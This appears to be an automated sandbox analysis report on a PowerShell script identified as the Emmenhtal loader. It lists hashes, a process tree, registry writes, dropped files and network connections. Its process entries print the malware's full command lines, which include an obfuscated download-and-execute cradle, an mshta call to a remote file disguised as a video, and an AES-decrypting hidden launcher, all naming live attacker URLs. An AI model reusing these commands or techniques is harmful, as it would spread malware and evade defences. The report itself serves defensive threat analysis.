File name:

start.ps1

Full analysis: https://app.any.run/tasks/560c4665-6289-4b1a-b65f-c8fc98297c71
Verdict: Malicious activity
Threats:

First identified in 2024, Emmenhtal operates by embedding itself within modified legitimate Windows binaries, often using HTA (HTML Application) files to execute malicious scripts. It has been linked to the distribution of malware such as CryptBot and Lumma Stealer. Emmenhtal is typically disseminated through phishing campaigns, including fake video downloads and deceptive email attachments.

Analysis date: February 08, 2025, 16:52:37
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
emmenhtal
loader
Indicators:
MIME: text/plain
File info: ASCII text
MD5:

5FC933DA0991BBC1FF9ED94831D25759

SHA1:

19628CA8C071DCBB998926CC3E41933CBD655A8B

SHA256:

C03114B8436263E0FE11B9D102BC72E3A548C68A55F06F42029BE6A7B9BA7951

SSDEEP:

3:VSJJFISFuqpIKwRROLWPXC59dIBM/Mvn:s8SFfpIKwR0L9OM/Mvn

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 6264)
      • powershell.exe (PID: 6896)
      • powershell.exe (PID: 4996)
    • Bypass execution policy to execute commands

      • powershell.exe (PID: 3536)
      • powershell.exe (PID: 4996)
    • EMMENHTAL loader has been detected

      • powershell.exe (PID: 6264)
    • Changes powershell execution policy (Unrestricted)

      • mshta.exe (PID: 6480)
    • Uses AES cipher (POWERSHELL)

      • powershell.exe (PID: 6896)
    • Changes powershell execution policy (Bypass)

      • powershell.exe (PID: 6896)
    • Script downloads file (POWERSHELL)

      • powershell.exe (PID: 4996)
  • SUSPICIOUS

    • Starts POWERSHELL.EXE for commands execution

      • powershell.exe (PID: 3536)
      • mshta.exe (PID: 6480)
      • powershell.exe (PID: 6896)
    • The process bypasses the loading of PowerShell profile settings

      • mshta.exe (PID: 6480)
      • powershell.exe (PID: 6896)
    • Application launched itself

      • powershell.exe (PID: 3536)
    • Executes script without checking the security policy

      • powershell.exe (PID: 6896)
      • powershell.exe (PID: 4996)
    • Probably obfuscated PowerShell command line is found

      • mshta.exe (PID: 6480)
    • Starts a new process with hidden mode (POWERSHELL)

      • powershell.exe (PID: 6896)
  • INFO

    • Reads Internet Explorer settings

      • mshta.exe (PID: 6480)
    • Checks proxy server information

      • mshta.exe (PID: 6480)
      • powershell.exe (PID: 4996)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 6896)
    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 6896)
    • Creates or changes the value of an item property via Powershell

      • powershell.exe (PID: 6896)
    • Disables trace logs

      • powershell.exe (PID: 4996)
No Malware configuration.
No data.
Total processes
136
Monitored processes
8
Malicious processes
5
Suspicious processes
0

Behavior graph

start
  • powershell.exe no specs
  • conhost.exe no specs
  • #EMMENHTAL powershell.exe no specs
  • mshta.exe
  • powershell.exe no specs
  • conhost.exe no specs
  • powershell.exe
  • conhost.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
PID: 3536
CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass C:\Users\admin\AppData\Local\Temp\start.ps1
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 4996
CMD: "C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command Set-Item Variable:\TNX (((([Net.WebClient]::New()|Get-Member)|?{(Get-Variable _).Value.Name-clike '*nl*g'}).Name));Set-Variable R 'https://rbk.scalingposturestrife.shop/b313d4a4588bd2e7bc9ece877caba58a.png';Set-Variable 4 ([Net.WebClient]::New());&$ExecutionContext.(($ExecutionContext|Get-Member)[6].Name).GetCommand($ExecutionContext.(($ExecutionContext|Get-Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Get-Member)[6].Name).PsObject.Methods|?{(Get-Variable _).Value.Name-clike '*nd*e'}).Name)( 'In*-Ex*ion', $TRUE, $TRUE),[System.Management.Automation.CommandTypes]::Cmdlet)(Get-Variable 4 -ValueOn).((Variable TNX).Value)((Variable R -ValueO))
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
PID: 5096
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 5320
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 6264
CMD: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 . \*i*\*2\msh*e https://dns-verify-me.pro/xfiles/train.mp4
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
PID: 6480
CMD: "C:\Windows\System32\mshta.exe" https://dns-verify-me.pro/xfiles/train.mp4
Path: C:\Windows\System32\mshta.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
11.00.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\mshta.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\wldp.dll
PID: 6896
CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function asfFKOT($bdnfJHpy){-split($bdnfJHpy -replace '..', '0x$& ')};$DIBk=asf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iBDc=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((asfFKOT('674445447A715953714E6E7877494170')),[byte[]]::new(16)).TransformFinalBlock($DIBk,0,$DIBk.Length)); & $RiBDc.Substring(0,3) $RiBDc.Substring(3)
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: mshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
PID: 6904
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
18 887
Read events
18 870
Write events
17
Delete events
0

Modification events

(PID) Process: (6480) mshta.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation: write
Name: CachePrefix
Value:

(PID) Process: (6480) mshta.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation: write
Name: CachePrefix
Value: Cookie:

(PID) Process: (6480) mshta.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation: write
Name: CachePrefix
Value: Visited:

(PID) Process: (4996) powershell.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation: write
Name: EnableFileTracing
Value: 0

(PID) Process: (4996) powershell.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation: write
Name: EnableAutoFileTracing
Value: 0

(PID) Process: (4996) powershell.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation: write
Name: EnableConsoleTracing
Value: 0

(PID) Process: (4996) powershell.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation: write
Name: FileTracingMask
Value:

(PID) Process: (4996) powershell.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation: write
Name: ConsoleTracingMask
Value:

(PID) Process: (4996) powershell.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation: write
Name: MaxFileSize
Value: 1048576

(PID) Process: (4996) powershell.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation: write
Name: FileDirectory
Value: %windir%\tracing

Executable files
0
Suspicious files
10
Text files
8
Unknown types
0

Dropped files

PID
Process
Filename
Type
PID: 3536
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_kppapp4d.wok.psm1
Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 3536
Process: powershell.exe
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF136034.TMP
Type: binary
MD5: D040F64E9E7A2BB91ABCA5613424598E
SHA256: D04E0A6940609BD6F3B561B0F6027F5CA4E8C5CF0FB0D0874B380A0374A8D670

PID: 6264
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Type: binary
MD5: 5F303CB2454212C773212A34FEA8CBC9
SHA256: E739B96FC39686690703440DF6E1B97C16466C4CEB865B0E62C5CB84CD4008D0

PID: 6896
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_053wbhs4.w1t.ps1
Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 6480
Process: mshta.exe
Filename: C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12
Type: binary
MD5: C9BE626E9715952E9B70F92F912B9787
SHA256: C13E8D22800C200915F87F71C31185053E4E60CA25DE2E41E160E09CD2D815D4

PID: 6480
Process: mshta.exe
Filename: C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12
Type: binary
MD5: 41860C041B6764103EC5E5178CC56454
SHA256: 36BD31D641F0CA683D9E8CD2569653AAD80756AF6FB03B66B9DC18137A20734F

PID: 6480
Process: mshta.exe
Filename: C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8
Type: binary
MD5: 572F72DFE7C8BF9CD5ABE2D8AF160DE4
SHA256: 1DC7C18A76F63A09C4216325E25C19E937DEE0CD89626657F49550790D36C896

PID: 6480
Process: mshta.exe
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\RR3E01RZ\train[1].mp4
Type: binary
MD5: E080BFEC705B9BD0FD93791D92B2FD49
SHA256: 30517FA2FB275E4E2EED484ED7C0A262AD2F20D75D5354541DEEB5B43802B5DF

PID: 4996
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ukfr2kzg.55a.ps1
Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 6896
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_fg1bfkic.ife.psm1
Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

HTTP(S) requests
9
TCP/UDP connections
33
DNS requests
20
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4712
MoUsoCoreWorker.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
4712
MoUsoCoreWorker.exe
GET
200
184.24.77.38:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
unknown
whitelisted
6480
mshta.exe
GET
200
142.250.186.35:80
http://c.pki.goog/r/gsr1.crl
unknown
whitelisted
6480
mshta.exe
GET
200
142.250.186.35:80
http://c.pki.goog/r/r4.crl
unknown
whitelisted
1176
svchost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
6376
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
6376
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
7096
backgroundTaskHost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D
unknown
whitelisted

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4712
MoUsoCoreWorker.exe
184.24.77.38:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
4
System
192.168.100.255:138
whitelisted
1356
svchost.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
5064
SearchApp.exe
104.126.37.171:443
www.bing.com
Akamai International B.V.
DE
whitelisted
4712
MoUsoCoreWorker.exe
184.30.21.171:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
2.17.190.73:80
ocsp.digicert.com
AKAMAI-AS
DE
whitelisted
4712
MoUsoCoreWorker.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
2212
RUXIMICS.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
3976
svchost.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
6480
mshta.exe
188.114.97.9:443
dns-verify-me.pro
CLOUDFLARENET
NL
unknown

DNS requests

Domain
IP
Reputation
google.com
  • 142.250.185.206
whitelisted
crl.microsoft.com
  • 184.24.77.38
  • 184.24.77.27
  • 184.24.77.7
  • 184.24.77.41
  • 184.24.77.12
  • 184.24.77.35
  • 184.24.77.11
  • 184.24.77.30
  • 184.24.77.42
whitelisted
www.bing.com
  • 104.126.37.171
  • 104.126.37.153
  • 104.126.37.154
  • 104.126.37.161
  • 104.126.37.162
  • 104.126.37.178
  • 104.126.37.163
  • 104.126.37.170
  • 104.126.37.155
whitelisted
www.microsoft.com
  • 184.30.21.171
whitelisted
ocsp.digicert.com
  • 2.17.190.73
whitelisted
settings-win.data.microsoft.com
  • 40.127.240.158
whitelisted
dns-verify-me.pro
  • 188.114.97.9
  • 188.114.96.9
unknown
c.pki.goog
  • 142.250.186.35
whitelisted
login.live.com
  • 40.126.31.2
  • 40.126.31.3
  • 20.190.159.64
  • 40.126.31.73
  • 20.190.159.131
  • 20.190.159.73
  • 40.126.31.0
  • 40.126.31.129
whitelisted
go.microsoft.com
  • 23.35.238.131
whitelisted

Threats

No threats detected
No debug info